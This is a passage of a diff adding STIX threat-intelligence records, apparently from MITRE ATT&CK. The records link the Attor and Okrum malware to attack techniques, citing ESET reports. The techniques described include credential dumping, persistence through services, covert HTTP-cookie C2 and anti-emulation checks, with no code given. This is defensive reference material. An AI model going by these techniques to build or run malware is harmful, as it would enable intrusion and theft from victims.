+ "id": "relationship--75a82c43-c3f2-4cec-a9cb-3407b03f27b7",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.641Z",
+ "created": "2020-05-06T21:01:23.641Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--68ab9dc7-4258-439c-b011-945175476fb7",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.649Z",
+ "created": "2020-05-06T21:01:23.649Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--20ac9204-3ee3-454d-9d53-d5caa9ec582e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.653Z",
+ "created": "2020-05-06T21:01:23.653Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--01a01a28-19e5-4e32-8a24-a98f2b69ced5",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.656Z",
+ "created": "2020-05-06T21:01:23.656Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)\u2019s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d42cdf33-c3c1-4546-9a4f-40f6f64cd524",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.663Z",
+ "created": "2020-05-06T21:01:23.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--faccd8d5-0e21-4e57-aef9-1ccf72150294",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.666Z",
+ "created": "2020-05-06T21:01:23.666Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e5cae4c-240d-495b-9eca-34bba583d894",
+ "type": "relationship",
+ "modified": "2020-05-06T21:12:31.929Z",
+ "created": "2020-05-06T21:12:31.929Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--09962c1d-38be-43f6-83bc-a63d1bebdb2d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.218Z",
+ "created": "2020-05-06T21:31:07.218Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3a040d38-be65-49b4-a41a-3fd010f3ea9a",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.305Z",
+ "created": "2020-05-06T21:31:07.305Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--abf2a4b0-d0d7-4f13-9b7c-647abc3694e2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.309Z",
+ "created": "2020-05-06T21:31:07.309Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has built-in commands for uploading, downloading, and executing files to the system.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--140dda5e-b3d5-47ce-aac5-22060d5bddf2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.316Z",
+ "created": "2020-05-06T21:31:07.315Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fcd3bc09-f88b-43d7-989d-10f7058e655e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.327Z",
+ "created": "2020-05-06T21:31:07.327Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7898362c-a930-4cd4-9c94-019a253af141",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.334Z",
+ "created": "2020-05-06T21:31:07.334Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--95e5fd0e-b9c1-4efa-b462-a922456401e6",
+ "type": "relationship",
+ "modified": "2020-05-07T17:54:13.483Z",
+ "created": "2020-05-06T21:31:07.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--54ece776-8a64-4e0c-9d54-4350680c07b8",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.563Z",
+ "created": "2020-05-06T21:31:07.563Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cebe7625-3bb7-4353-9b48-cd4251410968",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.578Z",
+ "created": "2020-05-06T21:31:07.578Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8c77a88d-1390-4736-b7c9-f902b62d7f45",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.590Z",
+ "created": "2020-05-06T21:31:07.590Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0b582433-b5e6-49d7-886c-e1edd1a0a802",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.597Z",
+ "created": "2020-05-06T21:31:07.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--bf603371-ff65-4b57-b80a-4f93daafbed6",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.613Z",
+ "created": "2020-05-06T21:31:07.613Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--060d2cd5-a734-4c78-908c-a9ddabe3aa89",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.558Z",
+ "created": "2020-05-06T21:31:07.558Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s installer can attempt to achieve persistence by creating a scheduled task.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--40fad687-982e-4cd3-955c-3c458e34e5df",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.573Z",
+ "created": "2020-05-06T21:31:07.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d96d964f-fec6-475e-acc5-d25ff0d46af9",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.621Z",
+ "created": "2020-05-06T21:31:07.621Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2ef7a9cd-aba5-4360-9a8f-f6b58ff4492d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.594Z",
+ "created": "2020-05-06T21:31:07.593Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8483ad9a-84c9-4c83-a4d7-d403e44735dc",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.617Z",
+ "created": "2020-05-06T21:31:07.617Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6d8147e4-fca3-4348-9376-dd96cc7b9e30",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.554Z",
+ "created": "2020-05-06T21:31:07.554Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f89f5b59-9a3d-4f3a-9740-2bc1e063b752",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.587Z",
+ "created": "2020-05-06T21:31:07.587Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2abdb5f5-6ff1-4f05-b925-429595011475",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.610Z",
+ "created": "2020-05-06T21:31:07.610Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
